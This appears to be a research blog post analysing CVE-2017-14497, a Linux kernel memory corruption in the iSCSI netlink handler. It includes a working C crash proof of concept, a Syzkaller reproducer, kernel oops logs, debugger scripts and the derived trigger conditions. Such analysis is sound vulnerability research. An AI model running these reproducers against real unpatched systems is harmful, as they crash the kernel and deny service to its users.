CVE-2017-14497
Introduction
Recently I was taking a research on Linux kernel vulnerability and kernel fuzzing. CVE-2017-14497 is a Linux Kernel Oops that affects Linux Kernel before Linux-4.13-rc2. This post will give a detailed analysis on the crash.
Crash POC
The POC has been released on exploit-db. After removing some redundant codes of the POC the full code is as following:
#include <sys/socket.h> #include <linux/netlink.h> #include <stdlib.h> #include <string.h> #include <stdio.h> #define NETLINK_USER 31 #define MAX_PAYLOAD 1024 /* maximum payload size*/ struct sockaddr_nl src_addr, dest_addr; struct nlmsghdr *nlh = NULL; struct iovec iov; int sock_fd; struct msghdr msg; int main() { sock_fd=socket(PF_NETLINK, SOCK_RAW, NETLINK_ISCSI); if(sock_fd<0) return -1; memset(&src_addr, 0, sizeof(src_addr)); src_addr.nl_family = AF_NETLINK; src_addr.nl_pid = getpid(); /* self pid */ bind(sock_fd, (struct sockaddr*)&src_addr, sizeof(src_addr)); memset(&dest_addr, 0, sizeof(dest_addr)); memset(&dest_addr, 0, sizeof(dest_addr)); dest_addr.nl_family = AF_NETLINK; dest_addr.nl_pid = 0; /* For Linux Kernel */ dest_addr.nl_groups = 0; /* unicast */ nlh = (struct nlmsghdr *)malloc(NLMSG_SPACE(MAX_PAYLOAD)); memset(nlh, 0, NLMSG_SPACE(MAX_PAYLOAD)); nlh->nlmsg_len = 0xac; nlh->nlmsg_pid = getpid(); nlh->nlmsg_flags = 0; strcpy(NLMSG_DATA(nlh), "ABCDEFGHabcdefghABCDEFGHabcdef ghABCDEFGHabcdefghABCDEFGHabcdefghABCDEFGHabcdefghABCDEFGHab cdefghAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBCCCCCCCCCCCCCCCCDDDDDDDDDDDD\x10"); iov.iov_base = (void *)nlh; iov.iov_len = 0xc0; msg.msg_name = (void *)&dest_addr; msg.msg_namelen = sizeof(dest_addr); msg.msg_iov = &iov; msg.msg_iovlen = 1; printf("Sending message to kernel\n"); sendmsg(sock_fd,&msg,0); printf("Waiting for message from kernel\n"); /* Read message from kernel */ recvmsg(sock_fd, &msg, 0); printf("Received message payload: %s\n", (char *)NLMSG_DATA(nlh)); close(sock_fd); }
And the crash info is as following:
[ 17.880629] BUG: unable to handle kernel NULL pointer dereference at 0000000000000028 [ 17.881586] IP: skb_release_data+0x77/0x110 [ 17.882093] PGD 7b02a067 P4D 7b02a067 PUD 7b02b067 PMD 0 [ 17.882743] Oops: 0002 [#1] SMP [ 17.883123] Modules linked in: [ 17.883493] CPU: 1 PID: 2687 Comm: test02 Not tainted 4.14.0-rc1+ #1 [ 17.884251] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014 [ 17.885350] task: ffff88007c5a1900 task.stack: ffffc90000e10000 [ 17.886058] RIP: 0010:skb_release_data+0x77/0x110 [ 17.886590] RSP: 0018:ffffc90000e13c08 EFLAGS: 00010202 [ 17.887213] RAX: 000000000000000d RBX: ffff88007bd50300 RCX: ffffffff820f96a0 [ 17.888059] RDX: 000000000000000c RSI: 0000000000000010 RDI: 000000000000000c [ 17.888893] RBP: ffffc90000e13c20 R08: ffffffff820f9860 R09: ffffc90000e13ad8 [ 17.889712] R10: ffffea0001ef5400 R11: ffff88007d001700 R12: 0000000000000000 [ 17.890349] R13: ffff88007be710c0 R14: 00000000000000c0 R15: 0000000000000000 [ 17.890977] FS: 00007f7614d4c700(0000) GS:ffff88007fd00000(0000) knlGS:0000000000000000 [ 17.891592] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 17.892054] CR2: 0000000000000028 CR3: 000000007b022000 CR4: 00000000000006e0 [ 17.892629] Call Trace: [ 17.892833] skb_release_all+0x1f/0x30 [ 17.893140] consume_skb+0x27/0x90 [ 17.893418] netlink_unicast+0x16a/0x210 [ 17.893735] netlink_sendmsg+0x2a3/0x390 [ 17.894050] sock_sendmsg+0x33/0x40 [ 17.894336] ___sys_sendmsg+0x29e/0x2b0 [ 17.894650] ? __wake_up_common_lock+0x7a/0x90 [ 17.895009] ? __wake_up+0xe/0x10 [ 17.895280] ? tty_write_unlock+0x2c/0x30 [ 17.895606] ? tty_ldisc_deref+0x11/0x20 [ 17.895925] ? n_tty_open+0xd0/0xd0 [ 17.896211] ? __vfs_write+0x23/0x130 [ 17.896512] __sys_sendmsg+0x40/0x70 [ 17.896805] ? __sys_sendmsg+0x40/0x70 [ 17.897133] SyS_sendmsg+0xd/0x20 [ 17.897408] entry_SYSCALL_64_fastpath+0x13/0x94 [ 17.897783] RIP: 0033:0x7f7614886320 [ 17.898186] RSP: 002b:00007fff6f17f9c8 EFLAGS: 00000246 ORIG_RAX: 000000000000002e [ 17.898793] RAX: ffffffffffffffda RBX: 00007f7614b2e7a0 RCX: 00007f7614886320 [ 17.899368] RDX: 0000000000000000 RSI: 0000000000600fc0 RDI: 0000000000000003 [ 17.899943] RBP: 0000000000000053 R08: 00000000ffffffff R09: 0000000000000000 [ 17.900521] R10: 0000000000000000 R11: 0000000000000246 R12: 0000000000400b9e [ 17.901095] R13: 00007f7614d50000 R14: 0000000000000019 R15: 0000000000400b9e [ 17.901672] Code: 45 31 e4 41 80 7d 02 00 48 89 fb 74 32 49 63 c4 48 83 c0 03 48 c1 e0 04 49 8b 7c 05 00 48 8b 47 20 48 8d 50 ff a8 01 48 0f 45 fa ff 4f 1c 74 7a 41 0f b6 45 02 41 83 c4 01 44 39 e0 7f ce 49 [ 17.903190] RIP: skb_release_data+0x77/0x110 RSP: ffffc90000e13c08 [ 17.903689] CR2: 0000000000000028 [ 17.903980] ---[ end trace 2f1926fbc1d32679 ]---
POC generated via Syzkaller
To get familiar with Linux syscall fuzzing, I tried to get Syzkaller from Github. To reproduce the stack trace from provided crash info, I build the linux kernel with CONFIG_SCSI, CONFIG_SCSI_DMA and CONFIG_SCSI_NETLINK and set the configuration file with enabling system call
"enable_syscalls":[ "socket$netlink", "bind", "getsockopt", "setsockopt", "sendmsg$netlink" ]
After fuzzing for about 42 hours on a 32-core machine, we finally get a crash from Syzkaller as following.
#define _GNU_SOURCE #include <stdint.h> #include <string.h> #include <sys/syscall.h> #include <unistd.h> long r[23]; void loop() { memset(r, -1, sizeof(r)); r[0] = syscall(__NR_mmap, 0x20000000ul, 0x13000ul, 0x3ul, 0x32ul, 0xfffffffffffffffful, 0x0ul); r[1] = syscall(__NR_socket, 0x10ul, 0x3ul, 0x8ul); *(uint64_t*)0x2000b000 = (uint64_t)0x20000000; *(uint32_t*)0x2000b008 = (uint32_t)0x0; *(uint64_t*)0x2000b010 = (uint64_t)0x20000000; *(uint64_t*)0x2000b018 = (uint64_t)0x1; *(uint64_t*)0x2000b020 = (uint64_t)0x20005ee8; *(uint64_t*)0x2000b028 = (uint64_t)0x0; *(uint32_t*)0x2000b030 = (uint32_t)0x0; *(uint64_t*)0x20000000 = (uint64_t)0x20003f40; *(uint64_t*)0x20000008 = (uint64_t)0xbc; *(uint32_t*)0x20003f40 = (uint32_t)0xac; *(uint16_t*)0x20003f44 = (uint16_t)0x103; *(uint16_t*)0x20003f46 = (uint16_t)0x120; *(uint32_t*)0x20003f48 = (uint32_t)0x10001; *(uint32_t*)0x20003f4c = (uint32_t)0x5; memcpy((void*)0x20003f50, "\xa9\xef\x5b\x66\xf7\x45\xe4\x72\xc0\xa5\x9d\xa2\x87\xb2\xdd\xc5\xcc\x65\x11\xd4\xb5\xd9\x42\xd9\xde\x63\x84\x76\xaf\xbe\x75\x36\xff\xb2\xdf\xef\x5f\x91\x67\x4e\x6e\xc5\x85\xd2\x98\x49\x46\x6a\xea\xe5\x96\x24\xf9\x94\x1d\xb4\x1a\xc4\x7d\x59\xaa\xbe\x64\x07\xab\xcb\x5c\x78\x8c\x43\x52\xed\xd1\x82\xa7\x74\x5c\x54\xe4\xde\x75\xf7\x01\x6a\xf7\xb4\x9d\x17\xc2\xa3\x0d\x08\x1b\x39\x1f\xbc\x4b\xd8\x5a\x7f\xb2\x47\xa3\x8d\x55\x63\x5f\x14\x23\xb2\xfb\x1e\x59\xa3\x32\xac\xc5\x1e\x55\x3d\x6c\x69\xeb\x6c\xe1\x21\x46\x10\xe9\xfb\x7c\x8d\x70\xed\xe2\xd6\xeb\x90\x31\x7c\x7f\x7e\x7b\x87\x31\x55\xbc\xfc\x14\xf6\xa9\x1c\xbd\x1d\x1f\xec", 156); *(uint32_t*)0x20003fec = (uint32_t)0x10; *(uint16_t*)0x20003ff0 = (uint16_t)0x3; *(uint16_t*)0x20003ff2 = (uint16_t)0x400; *(uint32_t*)0x20003ff4 = (uint32_t)0x7ee33a38; *(uint32_t*)0x20003ff8 = (uint32_t)0x400; r[22] = syscall(__NR_sendmsg, r[1], 0x2000b000ul, 0x40ul); } int main() { loop(); return 0; }
And the crash info is as following:
kasan: GPF could be caused by NULL-ptr deref or user memory access general protection fault: 0000 [#1] SMP KASAN Dumping ftrace buffer: (ftrace buffer empty) Modules linked in: CPU: 1 PID: 24691 Comm: syz-executor5 Not tainted 4.14.0-rc1 #2 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014 task: ffff88003d540d00 task.stack: ffff88003ab20000 RIP: 0010:__read_once_size include/linux/compiler.h:276 [inline] RIP: 0010:compound_head include/linux/page-flags.h:146 [inline] RIP: 0010:put_page include/linux/mm.h:838 [inline] RIP: 0010:__skb_frag_unref include/linux/skbuff.h:2760 [inline] RIP: 0010:skb_release_data+0x242/0x6a0 net/core/skbuff.c:568 RSP: 0018:ffff88003ab27770 EFLAGS: 00010202 RAX: 1ffff1000d77501e RBX: ffff88006bba80f0 RCX: 00000000000001e0 RDX: 0000000000003a34 RSI: ffffc90003800000 RDI: 000000000001d1a0 RBP: ffff88003ab27840 R08: 0000000000000000 R09: ffff88003ab27448 R10: 000000003e587075 R11: 0000000094d1f72b R12: ffffed0007564efb R13: dffffc0000000000 R14: 0000000000000000 R15: 000000000001d180 FS: 00007f159f65c700(0000) GS:ffff88003ed00000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000000020000000 CR3: 000000006b9bb000 CR4: 00000000000006e0 Call Trace: skb_release_all+0x4a/0x60 net/core/skbuff.c:631 __kfree_skb net/core/skbuff.c:645 [inline] consume_skb+0x11e/0x2c0 net/core/skbuff.c:705 netlink_unicast_kernel net/netlink/af_netlink.c:1274 [inline] netlink_unicast+0x546/0x780 net/netlink/af_netlink.c:1299 netlink_sendmsg+0xa22/0xe30 net/netlink/af_netlink.c:1862 sock_sendmsg_nosec net/socket.c:633 [inline] sock_sendmsg+0xca/0x110 net/socket.c:643 ___sys_sendmsg+0x714/0x900 net/socket.c:2049 __sys_sendmsg+0xe5/0x210 net/socket.c:2083 SYSC_sendmsg net/socket.c:2094 [inline] SyS_sendmsg+0x2d/0x50 net/socket.c:2090 entry_SYSCALL_64_fastpath+0x13/0x94 RIP: 0033:0x451e59 RSP: 002b:00007f159f65bc08 EFLAGS: 00000216 ORIG_RAX: 000000000000002e RAX: ffffffffffffffda RBX: 0000000000718000 RCX: 0000000000451e59 RDX: 0000000000000040 RSI: 000000002000b000 RDI: 0000000000000005 RBP: 00000000000038c0 R08: 0000000000000000 R09: 0000000000000000 R10: 0000000000000000 R11: 0000000000000216 R12: 00000000004ba0da R13: 00000000ffffffff R14: 0000000020010000 R15: 0000000000001000 Code: ff e8 a3 83 36 fe 48 89 d8 48 c1 e8 03 42 80 3c 28 00 0f 85 38 04 00 00 4c 8b 3b 41 c6 04 24 00 49 8d 7f 20 48 89 fa 48 c1 ea 03 80 3c 2a 00 0f 85 10 04 00 00 41 80 3c 24 00 49 8b 57 20 0f RIP: __read_once_size include/linux/compiler.h:276 [inline] RSP: ffff88003ab27770 RIP: compound_head include/linux/page-flags.h:146 [inline] RSP: ffff88003ab27770 RIP: put_page include/linux/mm.h:838 [inline] RSP: ffff88003ab27770 RIP: __skb_frag_unref include/linux/skbuff.h:2760 [inline] RSP: ffff88003ab27770 RIP: skb_release_data+0x242/0x6a0 net/core/skbuff.c:568 RSP: ffff88003ab27770 ---[ end trace b4440a82b2a42fbe ]--- Kernel panic - not syncing: Fatal exception Dumping ftrace buffer: (ftrace buffer empty) Kernel Offset: 0x18a00000 from 0xffffffff81000000 (relocation range: 0xffffffff80000000-0xffffffffbfffffff) Rebooting in 86400 seconds..
Crash Analysis
Crash Site Analysis
The crash code lies in /net/core/skbuff.c as below
static void skb_release_data(struct sk_buff *skb) { struct skb_shared_info *shinfo = skb_shinfo(skb); int i; if (skb->cloned && atomic_sub_return(skb->nohdr ? (1 frags[i]); if (shinfo->frag_list) kfree_skb_list(shinfo->frag_list); skb_zcopy_clear(skb, true); skb_free_head(skb); }
With some reverse engineering work and debugging script, I get the following information from kernel debugging.
set pagination off break *0xffffffff8187cb3f commands p/x $r13 set $shinfo = (struct skb_shared_info*)($r13) p/x *$shinfo end targe remote:1234 ignore 1 2 cont break *0xffffffff8187cb67 commands x/i $rip p/x $rdi end cont // Thread 1 hit Breakpoint 1, 0xffffffff8187cb3f in skb_release_data (skb=0xffff88007a428f40) at net/core/skbuff.c:567 567 for (i = 0; i nr_frags; i++) $1 = 0xffff88007af13890 $2 = {_unused = 0xffea, nr_frags = 0xff, tx_flags = 0xff, gso_size = 0x0, gso_segs = 0x0, frag_list = 0x0, hwtstamps = {hwtstamp = 0x0}, gso_type = 0x0, tskey = 0x0, ip6_frag_id = 0x0, dataref = {counter = 0x1}, destructor_arg = 0xcf0, frags = {{page = {p = 0x600cf0}, page_offset = 0x600cf0, size = 0x0}, {page = {p = 0x1e0}, page_offset = 0x1e0, size = 0x0}, {page = {p = 0x8}, page_offset = 0x4, size = 0x4}, {page = {p = 0x21c}, page_offset = 0x40021c, size = 0x0}, {page = {p = 0x40021c}, page_offset = 0x44, size = 0x0}, {page = {p = 0x44}, page_offset = 0x4, size = 0x0}, {page = {p = 0x46474e550}, page_offset = 0xbf8, size = 0x0}, {page = {p = 0x400bf8}, page_offset = 0x400bf8, size = 0x0}, {page = {p = 0x2c}, page_offset = 0x2c, size = 0x0}, {page = {p = 0x4}, page_offset = 0x6474e551, size = 0x6}, {page = {p = 0x0}, page_offset = 0x0, size = 0x0}, {page = {p = 0x0}, page_offset = 0x0, size = 0x0}, {page = {p = 0x0}, page_offset = 0x8, size = 0x0}, {page = {p = 0x0}, page_offset = 0x0, size = 0x0}, {page = {p = 0x0}, page_offset = 0x0, size = 0x0}, {page = {p = 0x0}, page_offset = 0x0, size = 0x0}, {page = {p = 0x0}, page_offset = 0x0, size = 0x0}}} Breakpoint 2 at 0xffffffff8187cb67: file ./arch/x86/include/asm/atomic.h, line 117. Thread 1 hit Breakpoint 2, put_page (page=) at ./include/linux/mm.h:852 852 if (put_page_testzero(page)) => 0xffffffff8187cb67 : lock decl 0x1c(%rdi) $3 = 0xc Memory layout: 0xffff88007af137d0: 0x00000000000000ac 0x00000acc00000000 0xffff88007af137e0: 0xffffffea00000067 0x6867666564636261 0xffff88007af137f0: 0x4847464544434241 0x6867666564636261 0xffff88007af13800: 0x4847464544434241 0x6867666564636261 0xffff88007af13810: 0x4847464544434241 0x6867666564636261 0xffff88007af13820: 0x4847464544434241 0x6867666564636261 0xffff88007af13830: 0x4847464544434241 0x6867666564636261 0xffff88007af13840: 0x4141414141414141 0x4141414141414141 0xffff88007af13850: 0x4242424242424242 0x4242424242424242 0xffff88007af13860: 0x4343434343434343 0x4343434343434343 0xffff88007af13870: 0x4444444444444444 0x0000001044444444 0xffff88007af13880: 0x0000000000000000 0x0000006700000000 0xffff88007af13890: 0x00000000ffffffea 0x0000000000000000 0xffff88007af138a0: 0x0000000000000000 0x0000000000000000
From the output of debugging script, we can observe that the nr_frags was overwritten by 0xff. The next step is to locate where the memory corruption occurs.
Memory Corruption Analysis
With reference to the patch provided online[1], the corruption step takes place in iscsi_if_rx in drivers /scsi/scsi_transport_iscsi.c
static void iscsi_if_rx(struct sk_buff *skb) { mutex_lock(&rx_queue_mutex); while (skb->len >= NLMSG_HDRLEN) { int err; uint32_t rlen; struct nlmsghdr *nlh; struct iscsi_uevent *ev; uint32_t group; nlh = nlmsg_hdr(skb); if (nlh->nlmsg_len len nlmsg_len) { break; } ev = nlmsg_data(nlh); rlen = NLMSG_ALIGN(nlh->nlmsg_len); if (rlen > skb->len) rlen = skb->len; err = iscsi_if_recv_msg(skb, nlh, &group); if (err) { ev->type = ISCSI_KEVENT_IF_ERROR; //vulnerable here ev->iferror = err; } do { /* * special case for GET_STATS: * on success - sending reply and stats from * inside of if_recv_msg(), * on error - fall through. */ if (ev->type == ISCSI_UEVENT_GET_STATS && !err) break; if (ev->type == ISCSI_UEVENT_GET_CHAP && !err) break; err = iscsi_if_send_reply(group, nlh->nlmsg_seq, nlh->nlmsg_type, 0, 0, ev, sizeof(*ev)); } while (err head + skb->end; } //netlink.h static inline struct nlmsghdr *nlmsg_hdr(const struct sk_buff *skb) { return (struct nlmsghdr *)skb->data; } static inline void *nlmsg_data(const struct nlmsghdr *nlh) { return (unsigned char *) nlh + NLMSG_HDRLEN; } /* Relevant structure struct nlmsghdr { __u32 nlmsg_len; __u16 nlmsg_type; __u16 nlmsg_flags; __u32 nlmsg_seq; __u32 nlmsg_pid; }; struct iscsi_uevent { uint32_t type; uint32_t iferror; uint64_t transport_handle; union { } u; union { } r; } */
After setting some breakpoints in Kernel, we get to know how memory corruption takes place.
//break condition before overwriting $33 = "skb->len" $34 = 0x14 $35 = 0xffff88007af1111c $36 = "nlh->len" $37 = 0xffff88007af1111c $38 = 0x10 $39 = "ev" 0xffff88007af1112c: 0x0000000000000000 0x0000000000000000 0xffff88007af1113c: 0x0000000000000000 0x0000000000000000 0xffff88007af1114c: 0x0000000000000000 0x00000cf000000001 0xffff88007af1115c: 0x00600cf000000000 0x00600cf000000000 //break condition after overwriting $50 = "skb->len" $51 = 0x4 $52 = 0xffff88007af1112c $53 = "nlh->len" $54 = 0xffff88007af1112c $55 = 0x67 $56 = "ev" 0xffff88007af1112c: 0xffffffea00000067 0x0000000000000000 0xffff88007af1113c: 0x0000000000000000 0x0000000000000000 0xffff88007af1114c: 0x0000000000000000 0x00000cf000000001 0xffff88007af1115c: 0x00600cf000000000 0x00600cf000000000 0xffff88007af1116c: 0x000001e000000000 0x000001e000000000 0xffff88007af1117c: 0x0000000800000000 0x0000000400000000 0xffff88007af1118c: 0x0000021c00000004 0x0040021c00000000 0xffff88007af1119c: 0x0040021c00000000 0x0000004400000000
Necessary Condition for the Crash
I try to generalize the necessary conditions for the crash as listed below:
- nlh→nlmsg_len = 0xac
- iov.iov_len > 0xac && iov.iov_len <= 0xc0
- *(nlh→seq + 0x9c) = “\x10”
My manually generated POC and fuzzing result of Syzkaller both satisfy these three conditions above. Interesting readers could verify the conclusion with help of some debugging script. According to the crash description given in [1], “skb->len == nlh->nlmsg_len and both are 0x10”. However, I find that the condition is slightly loose. Only nlh>nlsdg_len should be 0x10 and skb->len is larger or equal to nlh->nlmsg_len.